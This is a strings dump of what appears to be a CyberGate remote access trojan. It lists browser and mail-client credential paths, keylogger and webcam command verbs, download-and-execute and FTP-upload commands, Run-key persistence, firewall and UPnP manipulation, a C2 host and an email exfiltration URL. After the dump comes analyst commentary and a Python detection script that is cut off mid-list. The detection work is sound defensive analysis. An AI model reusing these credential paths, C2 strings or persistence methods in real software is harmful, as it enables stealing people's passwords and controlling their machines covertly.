saUsernamePassword
Password
PortD
0.0.0.1
0.0.0.0
BoundPort
DefaultPortD
TIdTCPConnection
TIdTCPConnectionX
IdTCPConnection
TIdTCPClientCustom
IdTCPClient
TIdTCPClient
TIdTCPClientH
BoundPortT
ole32.dll
EInvalidGraphicOperation
Please contact Cyber-Software support
shlwapi.dll
WbemScripting.SWbemLocator
%s\%s
SELECT * FROM %s
pathToSignedProductExe
pathToSignedReportingExe
USER32.DLL
comctl32.dll
uxtheme.dll
MAPI32.DLL
IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")
JumpID("","%s")
TKeyEvent
TKeyPressEvent
HelpKeyword
crSQLWait
%s (%s)
imm32.dll
AutoHotkeys
ssHotTrack
TWindowState
poProportional
TWMKey
KeyPreview
WindowState
OnKeyDown46g
OnKeyPress
OnKeyUp
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
vcltest3.dll
User32.dll
TWebcam
SetupApi.dll
SetupDiOpenClassRegKey
SetupDiOpenClassRegKeyExA
SetupDiOpenClassRegKeyExW
SetupDiCreateDeviceInterfaceRegKeyA
SetupDiCreateDeviceInterfaceRegKeyW
SetupDiOpenDeviceInterfaceRegKey
SetupDiDeleteDeviceInterfaceRegKey
SetupDiCreateDevRegKeyA
SetupDiCreateDevRegKeyW
SetupDiOpenDevRegKey
SetupDiDeleteDevRegKey
CM_DEVCAP_LOCKSUPPORTED
CM_DEVCAP_EJECTSUPPORTED
PDCAP_D0_SUPPORTED
PDCAP_D1_SUPPORTED
PDCAP_D2_SUPPORTED
PDCAP_D3_SUPPORTED
PDCAP_WAKE_FROM_D0_SUPPORTED
PDCAP_WAKE_FROM_D1_SUPPORTED
PDCAP_WAKE_FROM_D2_SUPPORTED
PDCAP_WAKE_FROM_D3_SUPPORTED
PDCAP_WARM_EJECT_SUPPORTED
ISO_646.irv:1991
ISO_646.basic:1983
ISO_646.irv:1983
csISO16Portuguese
csISO84Portuguese2
windows-936
csShiftJIS
windows-874
ISO-8859-1-Windows-3.0-Latin-1
csWindows30Latin1
ISO-8859-1-Windows-3.1-Latin-1
csWindows31Latin1
ISO-8859-2-Windows-Latin-2
csWindows31Latin2
ISO-8859-9-Windows-Latin-5
csWindows31Latin5
csMicrosoftPublishing
Windows-31J
csWindows31J
PTCP154
csPTCP154
windows-1250
windows-1251
windows-1252
windows-1253
windows-1254
windows-1255
windows-1256
windows-1257
windows-1258
HTTP-EQUIV
pre><pre>()<>@,;:\"./</pre><pre>()<>@,;:\"/[]?=</pre><pre>()<>@,;:\"/[]?={}</pre><pre>Z:\Projects\CyberGate Excel\Workplace\beta 2.5.2.0\Server\Indy10\Core\IdThread.pas</pre><pre>Z:\Projects\CyberGate Excel\Workplace\beta 2.5.2.0\Server\Indy10\Core\IdScheduler.pas</pre><pre>Z:\Projects\CyberGate Excel\Workplace\beta 2.5.2.0\Server\Indy10\Core\IdServerIOHandlerSocket.pas</pre><pre>EIdTCPNoOnExecute</pre><pre>TIdTCPServer</pre><pre>TIdTCPServerX</pre><pre>IdTCPServer</pre><pre>OnExecute</pre><pre>Z:\Projects\CyberGate Excel\Workplace\beta 2.5.2.0\Server\Indy10\Core\IdSchedulerOfThread.pas</pre><pre>%s User</pre><pre>IdCustomTCPServer</pre><pre>TIdCustomTCPServer</pre><pre>DefaultPort</pre><pre>EIdTCPServerError</pre><pre>Z:\Projects\CyberGate Excel\Workplace\beta 2.5.2.0\Server\Indy10\Core\IdCustomTCPServer.pas</pre><pre>CmdDelimiter</pre><pre>Z:\Projects\CyberGate Excel\Workplace\beta 2.5.2.0\Server\Indy10\Core\IdCommandHandlers.pas</pre><pre>'TIdCmdTCPServerAfterCommandHandlerEvent</pre><pre>TIdCmdTCPServer</pre><pre>(TIdCmdTCPServerBeforeCommandHandlerEvent</pre><pre>IdCmdTCPServer</pre><pre>Displays commands that the servers supports.</pre><pre>TIdTCPStream</pre><pre>IdRead() method of TIdTCPStream class does not support seeking</pre><pre>TIdHTTPProxyTransferMode</pre><pre>TIdHTTPProxyServerContextt</pre><pre>TIdHTTPProxyServerContext$</pre><pre>TOnHTTPContextEvent</pre><pre>TIdHTTPProxyServerContext</pre><pre>TOnHTTPDocument</pre><pre>TIdHTTPProxyServer</pre><pre>OnHTTPBeforeCommand</pre><pre>OnHTTPResponse</pre><pre>OnHTTPDocument</pre><pre>HTTP/1.0</pre><pre>HTTP/1.0 200 Connection established</pre><pre>HNetCfg.FwMgr</pre><pre>HNetCfg.FwAuthorizedApplication</pre><pre>PSAPI.dll</pre><pre>TWebcamThread</pre><pre>Uh.Uk</pre><pre>789:;<&'()* 
,-./12345</pre><pre>iphlpapi.dll</pre><pre>AllocateAndGetTcpExTableFromStack</pre><pre>AllocateAndGetUdpExTableFromStack</pre><pre>SetTcpEntry</pre><pre>GetExtendedTcpTable</pre><pre>GetExtendedUdpTable</pre><pre>SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\</pre><pre>TSendKey</pre><pre>sqlite3_bind_blob</pre><pre>sqlite3_bind_text</pre><pre>sqlite3_bind_double</pre><pre>sqlite3_bind_int</pre><pre>sqlite3_bind_int64</pre><pre>sqlite3_bind_null</pre><pre>sqlite3_bind_parameter_index</pre><pre>sqlite3_open</pre><pre>sqlite3_close</pre><pre>sqlite3_errmsg</pre><pre>sqlite3_free</pre><pre>sqlite3_prepare_v2</pre><pre>sqlite3_column_count</pre><pre>sqlite3_column_name</pre><pre>sqlite3_column_decltype</pre><pre>sqlite3_step</pre><pre>sqlite3_column_blob</pre><pre>sqlite3_column_bytes</pre><pre>sqlite3_column_double</pre><pre>sqlite3_column_text</pre><pre>sqlite3_column_type</pre><pre>sqlite3_column_int64</pre><pre>sqlite3_finalize</pre><pre>sqlite3_reset</pre><pre>ESQLiteException</pre><pre>TSQLiteDatabaseD</pre><pre>TSQLiteTable</pre><pre>Failed to open database "%s" : %s</pre><pre>Failed to open database "%s" : unknown error</pre><pre>Error executing SQL</pre><pre>Could not prepare SQL statement</pre><pre>Error executing SQL statement</pre><pre>SQLite is Busy</pre><pre>SOFTWARE\Mozilla\Mozilla Firefox</pre><pre>SOFTWARE\Wow6432Node\Mozilla\Mozilla Firefox</pre><pre>SOFTWARE\Mozilla\Mozilla Firefox\</pre><pre>SOFTWARE\Wow6432Node\Mozilla\Mozilla Firefox\</pre><pre>1234567890.</pre><pre>mozsqlite3.dll</pre><pre>sqlite3.dll</pre><pre>mozcrt19.dll</pre><pre>msvcr100.dll</pre><pre>mozglue.dll</pre><pre>mozutils.dll</pre><pre>nspr4.dll</pre><pre>plc4.dll</pre><pre>plds4.dll</pre><pre>nssutil3.dll</pre><pre>nss3.dll</pre><pre>PK11_GetInternalKeySlot</pre><pre>\Mozilla\Firefox\profiles.ini</pre><pre>\Mozilla\Firefox\</pre><pre>signons.sqlite</pre><pre>SELECT * FROM 
moz_logins</pre><pre>encryptedPassword</pre><pre>Microsoft\Network\Connections\pbk\rasphone.pbk</pre><pre>rasapi32.dll</pre><pre>rnaph.dll</pre><pre>RAS Passwords</pre><pre>SOFTWARE\Microsoft\Windows\CurrentVersion</pre><pre>Ps_Passwords</pre><pre>advapi32.dll</pre><pre>WindowsLive:name=*</pre><pre>\Mozilla Firefox\</pre><pre>MSVCR100.dll</pre><pre>softokn3.dll</pre><pre>userenv.dll</pre><pre>profiles.ini</pre><pre>\signons3.txt</pre><pre>\signons2.txt</pre><pre>\signons1.txt</pre><pre>\signons.txt</pre><pre>ps_SafariPasswordRecovery</pre><pre>AVURLProtocol_Classic</pre><pre>\Apple Computer\Preferences\keychain.plist</pre><pre>\Apple\Apple Application Support\CFNetwork.dll</pre><pre>http://</pre><pre>ftp://</pre><pre>*ftp://</pre><pre>https://</pre><pre>Shell.Application</pre><pre>http://cyber-sec.org/email/asp/email.php?email=</pre><pre>TMemoryOperation</pre><pre>%sysdir%\</pre><pre>%serverpath%\</pre><pre>%sysdir%</pre><pre>%serverpath%</pre><pre>Proxy Bypass</pre><pre>ntdll.dll</pre><pre>TPasswordItem</pre><pre>TArrayPasswod</pre><pre>Crypt32.dll</pre><pre>shell32.dll</pre><pre>Advapi32.dll</pre><pre>SOFTWARE\MOZILLA\MOZILLA FIREFOX</pre><pre>SOFTWARE\MOZILLA\MOZILLA FIREFOX\version.dll\Main</pre><pre>select * from moz_logins</pre><pre>Firefox</pre><pre>SOFTWARE\MOZILLA\MOZILLA FIREFOX\</pre><pre>\Flock\Browser\profiles.ini</pre><pre>Flock-Firefox</pre><pre>\1-abc\personal calendar\sqlite3.dll</pre><pre>\clipdiary\sqlite3.dll</pre><pre>\conceptworld\recentx\sqlite3.dll</pre><pre>\darq software\transmute\sqlite3.dll</pre><pre>\delphish\sqlite3.dll</pre><pre>\ditto\sqlite3.dll</pre><pre>\du meter\sqlite3.dll</pre><pre>\fcleaner\sqlite3.dll</pre><pre>\file seeker\sqlite3.dll</pre><pre>\flashnote\sqlite3.dll</pre><pre>\flashpaste\sqlite3.dll</pre><pre>\gorecord\sqlite3.dll</pre><pre>\gorecord2\sqlite3.dll</pre><pre>\linkcollector 
portable\sqlite3.dll</pre><pre>\ma-config.com\sqlite3.dll</pre><pre>\macrovirus\sqlite3.dll</pre><pre>\msnsniffer2\sqlite3.dll</pre><pre>\notecable\sqlite3.dll</pre><pre>\nzbleecher\sqlite3.dll</pre><pre>\outlook express\sqlite3.dll</pre><pre>\page update watcher\sqlite3.dll</pre><pre>\pipi\sqlite3.dll</pre><pre>\qloud\sqlite3.dll</pre><pre>\qloud\winamp\sqlite3.dll</pre><pre>\qloud\windows media player\sqlite3.dll</pre><pre>\recordtheradio\sqlite3.dll</pre><pre>\rightload\sqlite3.dll</pre><pre>\smm\funny sms10\sqlite3.dll</pre><pre>\smm\simple mail 7\sqlite3.dll</pre><pre>\spiceworks\bin\sqlite3.dll</pre><pre>\spyware-secure\sqlite3.dll</pre><pre>\timelog\sqlite3.dll</pre><pre>\video2webcam\sqlite3.dll</pre><pre>\webmarkers\sqlite3.dll</pre><pre>\webmediaplayer\sqlite3.dll</pre><pre>\windows media player\plugins\qloud\sqlite3.dll</pre><pre>\Mozilla Firefox\sqlite3.dll</pre><pre>\VirusGuardPlus\sqlite3.dll</pre><pre>\Safari\sqlite3.dll</pre><pre>\AIMP2\sqlite3.dll</pre><pre>\Live-Player\sqlite3.dll</pre><pre>\TrustedProtection\sqlite3.dll</pre><pre>\PCTotalDefender\sqlite3.dll</pre><pre>\Common Files\eEye Digital Security\Application Bus\sqlite3.dll</pre><pre>Windows Live Messenger</pre><pre>DynDNS\Updater\config.dyndns</pre><pre>Password=</pre><pre>Software\DownloadManager\Passwords</pre><pre>Software\DownloadManager\Passwords\</pre><pre>EncPassword</pre><pre>YLoginWnd</pre><pre><Port></Port></pre><pre><Pass></Pass></pre><pre>FileZilla\recentservers.xml</pre><pre>FileZilla\sitemanager.xml</pre><pre>FileZilla\filezilla.xml</pre><pre><password></password></pre><pre>.purple\accounts.xml</pre><pre>abe2869f-9b47-4cd9-a358-c22904dba7f7</pre><pre>trillian.ini</pre><pre>accounts.ini</pre><pre>password</pre><pre>SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Trillian</pre><pre>Trillian\trillian.exe</pre><pre>Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook</pre><pre>Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging 
Subsystem\Profiles\Outlook\</pre><pre>###@@@!!!</pre><pre>IMAP Password</pre><pre>IMAP Password:</pre><pre>POP3 Password</pre><pre>POP3 Password:</pre><pre>HNetCfg.NATUPnP</pre><pre>StaticPortMappingCollection</pre><pre>Uh%Fm</pre><pre>TCpuUsageU</pre><pre>##,##0.00</pre><pre>TNewFTPThreadU</pre><pre>TPasswordU</pre><pre>SHFileOperationW</pre><pre>.hd'n</pre><pre>.hd*n</pre><pre>%s %s</pre><pre>Windows NT %d.%d</pre><pre>%s %s Server</pre><pre>Unknown Platform ID (%d)</pre><pre>%d.%d</pre><pre>%s [Build: %d</pre><pre>- Service Pack: %s</pre><pre>KERNEL32.DLL</pre><pre>TIdTCPClientNewp</pre><pre>TIdTCPClientNew</pre><pre>1.2.3</pre><pre>deflate 1.2.3 Copyright 1995-2005 Jean-loup Gailly</pre><pre>inflate 1.2.3 Copyright 1995-2005 Mark Adler</pre><pre>?456789:;<=</pre><pre>!"#$%&'()* ,-./0123</pre><pre>com.apple.Safari</pre><pre>com.apple.Safari0123456789ABCDEF</pre><pre>333333333333333333</pre><pre>33333833</pre><pre>3333339</pre><pre>3333333333333338</pre><pre>:*"*"$3338</pre><pre>3333333</pre><pre>33333333</pre><pre>33333333333</pre><pre>3333333333338</pre><pre>33338?383</pre><pre>333333333333</pre><pre>:*3:"$3338</pre><pre>333333333333333</pre><pre>KWindows</pre><pre>IdStackWindows</pre><pre>Sr_StartWebcam</pre><pre>UrlMon</pre><pre>UnitWebcamAPI</pre><pre>IdTCPStream</pre><pre> 
IdTCPServer</pre><pre>Sr_Windows</pre><pre>Cm_Keylogger</pre><pre>~Sr_Ports</pre><pre>}Unitsndkey32</pre><pre>Vps_FireFox3_5</pre><pre>SQLiteTable3</pre><pre>SQLite3</pre><pre>Ps_IEpasswords</pre><pre>ps_URLHistory</pre><pre>FPs_PasswordRecovery</pre><pre>Ps_OperaPasswords</pre><pre>Sr_MemoryEXE</pre><pre>Sr_MemoryExecuteFunctions</pre><pre>U_GrabFirefox10</pre><pre>YU_GrabFirefox8</pre><pre>6U_GrabFirefox</pre><pre>\U_GrabChrome</pre><pre>U_GrabFirefox15</pre><pre>U_Grabfirefox22</pre><pre>{IdCmdTCPClient</pre><pre>SetNamedPipeHandleState</pre><pre>GetWindowsDirectoryW</pre><pre>GetProcessHeap</pre><pre>GetCPInfo</pre><pre>CreatePipe</pre><pre>RegQueryInfoKeyA</pre><pre>RegOpenKeyExW</pre><pre>RegOpenKeyExA</pre><pre>RegOpenKeyW</pre><pre>RegOpenKeyA</pre><pre>RegFlushKey</pre><pre>RegEnumKeyExW</pre><pre>RegEnumKeyExA</pre><pre>RegDeleteKeyW</pre><pre>RegCreateKeyExW</pre><pre>RegCreateKeyExA</pre><pre>RegCreateKeyW</pre><pre>RegCloseKey</pre><pre>CryptImportKey</pre><pre>CryptSetKeyParam</pre><pre>CryptDestroyKey</pre><pre>SetViewportOrgEx</pre><pre>GdiplusShutdown</pre><pre>ShellExecuteW</pre><pre>FindExecutableW</pre><pre>SHDeleteKeyW</pre><pre>URLDownloadToFileW</pre><pre>keybd_event</pre><pre>VkKeyScanW</pre><pre>UnhookWindowsHookEx</pre><pre>SetWindowsHookExW</pre><pre>SetWindowsHookExA</pre><pre>SetKeyboardState</pre><pre>MsgWaitForMultipleObjects</pre><pre>MapVirtualKeyW</pre><pre>MapVirtualKeyA</pre><pre>LoadKeyboardLayoutA</pre><pre>GetKeyboardState</pre><pre>GetKeyboardLayoutList</pre><pre>GetKeyboardLayout</pre><pre>GetKeyState</pre><pre>GetKeyNameTextA</pre><pre>ExitWindowsEx</pre><pre>EnumWindows</pre><pre>EnumThreadWindows</pre><pre>ActivateKeyboardLayout</pre><pre>GetKeyboardType</pre><pre>FtpPutFileW</pre><pre>FtpSetCurrentDirectoryW</pre><pre>InternetOpenUrlW</pre><pre>InternetOpenUrlA</pre><pre>HttpQueryInfoA</pre><pre>.idata</pre><pre>.rdata</pre><pre>P.reloc</pre><pre>P.rsrc</pre><pre>[E.MyFull</pre><pre>-!GA?EXE</pre><pre>LMsg</pre><pre>AVICA
P32.DLL</pre><pre>crypt32.dll</pre><pre>gdi32.dll</pre><pre>gdiplus.dll</pre><pre>mpr.dll</pre><pre>msacm32.dll</pre><pre>powrprof.dll</pre><pre>pstorec.dll</pre><pre>URLMON.DLL</pre><pre>user32.dll</pre><pre>version.dll</pre><pre>wininet.dll</pre><pre>winmm.dll</pre><pre>wsock32.dll</pre><pre>HKEY_CLASSES_ROOT</pre><pre>HKEY_CURRENT_USER</pre><pre>HKEY_LOCAL_MACHINE</pre><pre>HKEY_USERS</pre><pre>HKEY_CURRENT_CONFIG</pre><pre>Portugal</pre><pre>Turkey</pre><pre>WEBCAM</pre><pre>*<>#%"{}|\^[]`</pre><pre>uploadandexecute</pre><pre>uploadandexecuteyes|</pre><pre>uploadandexecuteno|</pre><pre>webcam|webcamstream|</pre><pre>webcam|webcamstop|</pre><pre>webcamstart</pre><pre>[Execute]</pre><pre>KeyDelBackspace</pre><pre>CyberGateKeylogger</pre><pre>software\microsoft\windows\currentversion\uninstall\</pre><pre>Invalid Key Name</pre><pre>Invalid KeyName</pre><pre>%Username%</pre><pre>%Country%</pre><pre>Úte%</pre><pre>FirstExecution</pre><pre>keylogger|keyloggeronlinekey|</pre><pre>keylogger|keyloggerativar|T|</pre><pre>keylogger|keyloggerativar|F|</pre><pre>webcamlist|</pre><pre>webcam</pre><pre>filemanager|fmsendftpyes|</pre><pre>filemanager|fmsendftpno|</pre><pre>FIREFOX2|</pre><pre>FIREFOX8|</pre><pre>FIREFOX10|</pre><pre>FIREFOX15|</pre><pre>FIREFOX22|</pre><pre>\Opera\Opera\wand.dat</pre><pre>OPERA|</pre><pre>\Google\Chrome\User Data\Default\Login Data</pre><pre>CHROME|</pre><pre>\Google\Chrome\User Data\Default\Web 
Data</pre><pre>getpasswords</pre><pre>downexec</pre><pre>openweb</pre><pre>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\</pre><pre>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce\</pre><pre>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\</pre><pre>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce\</pre><pre>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\</pre><pre>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce\</pre><pre>fmexecnormal</pre><pre>filemanager|fmexecnormal|</pre><pre>fmexechide</pre><pre>filemanager|fmexechide|</pre><pre>fmexecparam</pre><pre>filemanager|fmexecparam|F|</pre><pre>filemanager|fmexecparam|T|</pre><pre>fmsendftp</pre><pre>filemanager|fmsendftp|</pre><pre>listarportas</pre><pre>listarportas|listadeportasativas|</pre><pre>listarportasdns</pre><pre>listarportas|finalizarconexao|</pre><pre>finalizarprocessoportas</pre><pre>listarportas|finalizarprocessoportas|Y|</pre><pre>listarportas|finalizarprocessoportas|N|</pre><pre>tecaladoexecutar</pre><pre>webcamconfig</pre><pre>keylogger</pre><pre>keylogger|keyloggeronlinestart|</pre><pre>keylogger|keyloggeronlinestop|</pre><pre>keyloggerativar</pre><pre>keyloggerdesativar</pre><pre>keyloggerbaixar</pre><pre>keylogger|keyloggerbaixar|</pre><pre>keylogger|keyloggerbaixar|NOLOGS</pre><pre>keyloggerexcluir</pre><pre>keylogger|keyloggerexcluir|</pre><pre>keyloggeronlinestart</pre><pre>keyloggeronlinestop</pre><pre>chromepass</pre><pre>chromepass|</pre><pre>keysearch</pre><pre>keysearch|NO</pre><pre>keysearch|YES</pre><pre>sendkeyswindow</pre><pre>enviarlogskey</pre><pre>enviarlogskey|</pre><pre>rar.exe</pre><pre>rarreg.key</pre><pre>vs.vbs</pre><pre>bs.bat</pre><pre>memoryexecoperation</pre><pre>TeamViewer.exe</pre><pre>TeamViewer_Resource.dll</pre><pre>TV.dll</pre><pre>x.html</pre><pre>Windows 3.1</pre><pre>Windows 95 (Release 2)</pre><pre>Windows 95</pre><pre>Windows 98 
SE</pre><pre>Windows 98</pre><pre>Windows ME</pre><pre>Windows 8</pre><pre>Windows 7</pre><pre>Windows Vista</pre><pre>Windows XP Professional x64</pre><pre>Windows XP Home</pre><pre>Windows XP Professional</pre><pre>Windows 2000 Professional</pre><pre>Windows 2008</pre><pre>Windows 2003 Server Datacenter</pre><pre>Windows 2003 Server Enterprise</pre><pre>Windows 2003 Server Web Edition</pre><pre>Windows 2003 Server</pre><pre>Windows Home Server</pre><pre>Windows 2003 Server (Release 2)</pre><pre>Windows 2000 Server Datacenter</pre><pre>Windows 2000 Server Enterprise</pre><pre>Windows 2000 Server Web Edition</pre><pre>Windows 2000 Server</pre><pre>Windows NT 4.0 Server Datacenter</pre><pre>Windows NT 4.0 Server Enterprise</pre><pre>Windows NT 4.0 Server Web Edition</pre><pre>Windows NT 4.0 Server</pre><pre>SelfDelete.bat</pre><pre>Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>Software\Microsoft\Windows\CurrentVersion\RunOnce</pre><pre>Software\Microsoft\Windows NT\CurrentVersion\Windows</pre><pre>SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon</pre><pre>Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run</pre><pre>explorer.exe</pre><pre>\Microsoft\Windows\</pre><pre>CYBERGATEPASS</pre><pre>lala25.no-ip.biz</pre><pre>C:\User</pre><pre>InstallDir.exe</pre><pre>ÞFAULTBROWSER%</pre><pre>2.5.2.0</pre><pre>ftp.ftpserver.com</pre><pre>ftpuser</pre><pre>ftppass</pre><pre>Then set URL here.</pre><pre>calc.exe</pre><pre>notepad.exe</pre><pre>lsass.exe</pre><pre>explorer.exe</pre><pre>svchost.exe</pre><pre>http://www.somehosting.com/tagger.php</pre><pre>::{21EC2020-3AEA-1069-A2DD-08002B30309D}\::{2227A280-3AEA-1069-A2DE-08002B30309D}</pre><pre>::{031E4825-7B94-4dc3-B131-E946B44C8DD5}\{491E922F-5643-4af4-A7EB-4E7A138D8174}</pre><pre>::{59031a4?id=%ID%&name=%Username% @ %PCName%&version=%Version%</pre><pre>example@email.com</pre><pre>No help keyword specified.</pre><pre>No help found for %s#No context-sensitive help installed$No topic-based help 
system installed</pre><pre>Alt Clipboard does not support Icons/Menu '%s' is already being used by another form</pre><pre>Error creating window class Cannot focus a disabled or invisible window!Control '%s' has no parent window</pre><pre>OLE error %.8x.Method '%s' not supported by automation object/Variant does not reference an automation object7Dispatch methods do not support more than 64 parameters</pre><pre>Unsupported clipboard format</pre><pre>Transparent proxy cannot bind. UDP Not supported by this proxy.$Buffer terminator must be specified.!Buffer start position is invalid.</pre><pre>Reply Code is not valid: %s</pre><pre>Reply Code already exists: %s Thread must be specified for the scheduler.!You must have an OnExecute event.</pre><pre>Command not supported.</pre><pre>Address type not supported."%d: Circular links are not allowed"Not enough data in buffer. (%d/%d)</pre><pre>File "%s" not found</pre><pre>Object type not supported.</pre><pre>%s is not a valid IPv6 address:The requested IPVersion / Address family is not supported.</pre><pre>Set Size Exceeded.)UDP is not support in this SOCKS version.</pre><pre>Request rejected or failed.5Request rejected because SOCKS server cannot connect.QRequest rejected because the client program and identd report different user-ids.</pre><pre>Stack already created.1Only one TIdAntiFreeze can exist per application.&Cannot change IPVersion when connected$Can not bind in port range (%d - %d)</pre><pre>Connection Closed Gracefully.;Could not bind socket. 
Address and port are already in use.</pre><pre>Invalid Port Range (%d - %d)</pre><pre>%s is not a valid service.</pre><pre>"Operation not supported on socket.</pre><pre>Protocol family not supported.0Address family not supported by protocol family.</pre><pre>Socket is not connected..Cannot send or receive after socket is closed.#Too many references, cannot splice.</pre><pre>Operation would block.</pre><pre>Operation now in progress.</pre><pre>Operation already in progress.</pre><pre>Socket operation on non-socket.</pre><pre>Protocol not supported.</pre><pre>Socket type not supported.</pre><pre>Invalid destination array"Character index out of bounds (%d)</pre><pre>Start index out of bounds (%d)</pre><pre>Invalid count (%d)</pre><pre>Invalid destination index (%d)</pre><pre>Invalid codepage (%d)-Error on call to Winsock2 library function %s&Error on loading Winsock2 library (%s)</pre><pre>Resolving hostname %s.</pre><pre>Connecting to %s.</pre><pre>Socket Error # %d</pre><pre>List capacity out of bounds (%d)</pre><pre>List count out of bounds (%d)</pre><pre>List index out of bounds (%d) Out of memory while expanding memory stream</pre><pre>Error reading %s%s%s: %s</pre><pre>Failed to get data for '%s'</pre><pre>Resource %s not found</pre><pre>%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration group</pre><pre>Property %s does not exist</pre><pre>Thread creation error: %s</pre><pre>Thread Error: %s (%d)</pre><pre>Bits index out of range*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main thread</pre><pre>Class %s not found</pre><pre>A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates</pre><pre>Cannot create file "%s". %s</pre><pre>Cannot open file "%s". 
%s</pre><pre>Invalid stream format$''%s'' is not a valid component name</pre><pre>Invalid data type for '%s'</pre><pre>Ancestor for '%s' not found</pre><pre>Cannot assign a %s to a %s</pre><pre>Interface not supported</pre><pre>%s (%s, line %d)</pre><pre>Abstract Error?Access violation at address %p in module '%s'. %s of address %p</pre><pre>System Error. Code: %d.</pre><pre>Invalid variant operation%Invalid variant operation (%s%.8x)</pre><pre>%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)</pre><pre>Operation not supported</pre><pre>External exception %x</pre><pre>Invalid pointer operation</pre><pre>Invalid class typecast0Access violation at address %p. %s of address %p</pre><pre>Operation aborted(Exception %s in module %s at %p.</pre><pre>Application Error1Format '%s' invalid or incompatible with argument</pre><pre>No argument for format '%s'"Variant method calls not supported</pre><pre>!'%s' is not a valid integer value('%s' is not a valid floating point value</pre><pre>I/O error %d</pre><pre>Integer overflow Invalid floating point operation</pre></pre></requestedExecutionLevel></pre></assemblyIdentity></pre></->
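What the iexplore.exe region above actually carries, and an added example for turning it into detection logic. The strings are a CyberGate RAT server build: the `Z:\Projects\CyberGate Excel\Workplace\beta 2.5.2.0\Server\Indy10\...` source paths, `CYBERGATEPASS`, `CyberGateKeylogger` and `Please contact Cyber-Software support`; a `|`-delimited command protocol with Portuguese-language verbs (`keyloggerativar`/`keyloggerdesativar` = enable/disable the keylogger, `keyloggerbaixar` = download the key log, `listarportas` = list ports, `finalizarconexao` = close a connection, `enviarlogskey` = send key logs); credential targets for Firefox (`signons.sqlite`, `SELECT * FROM moz_logins`), Chrome `Login Data`, Opera `wand.dat`, IE, Safari, FileZilla, Pidgin `.purple\accounts.xml`, Trillian, Outlook profiles and the RAS phonebook; firewall whitelisting and UPnP port mapping through the `HNetCfg.FwAuthorizedApplication` and `HNetCfg.NATUPnP` COM objects; keyboard hooking via `SetWindowsHookExW`; and the Run, RunOnce, RunServices, Winlogon and `Policies\Explorer\Run` persistence keys. The block of Delphi RTL and Indy error strings that opens this section and is repeated at the end of the region is library boilerplate that every Indy-built Delphi program contains, so a signature built on it would match legitimate software. The Python below is an added example, not code from the Lavasoft report or from CyberGate: it scores a dumped region on the family-specific strings only, groups the command verbs into a family/subcommand/flag tree for protocol-signature work, and pulls the strings that follow `CYBERGATEPASS`, which in this listing are the C2 host `lala25.no-ip.biz`, the install name `InstallDir.exe` and the version `2.5.2.0`. Reading that adjacency as the configuration block, the scoring threshold and the NUL-separated sample region are this example's assumptions, not facts stated by the report.

```python
"""
Strings-level triage for a CyberGate-style RAT memory region.

Added example; not part of the Lavasoft report and not CyberGate code.
Input is the raw bytes of a dumped region (NUL-separated strings, as a
process-memory dump yields). Three operations:
  1. score the region against tiered indicators taken from the listing,
     ignoring the Delphi RTL / Indy library strings every Indy build carries;
  2. group the pipe-delimited C2 verbs into family -> subcommand -> flags;
  3. return the strings following a marker such as CYBERGATEPASS (treating
     that adjacency as the config block is an assumption of this example).
"""
import re
from collections import defaultdict

# Tier 1: family-specific strings (build path, config marker, Portuguese verbs).
STRONG = [
    b"Z:\\Projects\\CyberGate Excel\\Workplace",
    b"CYBERGATEPASS",
    b"CyberGateKeylogger",
    b"Please contact Cyber-Software support",
    b"keyloggerativar",
    b"finalizarprocessoportas",
    b"listadeportasativas",
]
# Tier 2: capability strings shared with many stealers; corroborating only.
SUPPORT = [
    b"signons.sqlite",
    b"SELECT * FROM moz_logins",
    b"\\Google\\Chrome\\User Data\\Default\\Login Data",
    b"\\Opera\\Opera\\wand.dat",
    b"FileZilla\\sitemanager.xml",
    b"HNetCfg.FwAuthorizedApplication",
    b"StaticPortMappingCollection",
    b"SetWindowsHookExW",
]


def score_region(data: bytes) -> dict:
    """Tiered substring match. The threshold is this example's choice:
    two family-specific hits, or one hit plus three capability strings."""
    strong = [s.decode() for s in STRONG if s in data]
    support = [s.decode() for s in SUPPORT if s in data]
    verdict = len(strong) >= 2 or (len(strong) == 1 and len(support) >= 3)
    return {"strong": strong, "support": support, "cybergate": verdict}


# A command token is runs of letters joined by '|', e.g. keylogger|keyloggerativar|T|
CMD_RE = re.compile(rb"[A-Za-z]+(?:\|[A-Za-z]*)+")


def group_commands(data: bytes) -> dict:
    """Map 'family|subcommand|flag|' strings to {family: {subcommand: [flags]}}.
    Bare verbs such as 'chromepass|' become a family with no subcommands."""
    tree = defaultdict(lambda: defaultdict(set))
    for token in CMD_RE.findall(data):
        parts = [p.decode() for p in token.split(b"|") if p]
        if len(parts) >= 2:
            tree[parts[0]][parts[1]].update(parts[2:])
        else:
            tree[parts[0]]  # touch the key so the family is recorded
    return {fam: {sub: sorted(flags) for sub, flags in subs.items()}
            for fam, subs in tree.items()}


def strings_after(data: bytes, marker: bytes, count: int) -> list:
    """Return the `count` NUL-separated strings that follow `marker`.
    If the marker sits inside a longer string, its remainder is the first item."""
    idx = data.find(marker)
    if idx < 0:
        return []
    tail = data[idx + len(marker):].lstrip(b"\x00")
    return [s.decode("latin-1") for s in tail.split(b"\x00") if s][:count]


# Constructed sample region: strings from the listing, NUL-separated as they
# sit in memory. Not a real dump.
SAMPLE_REGION = b"\x00".join([
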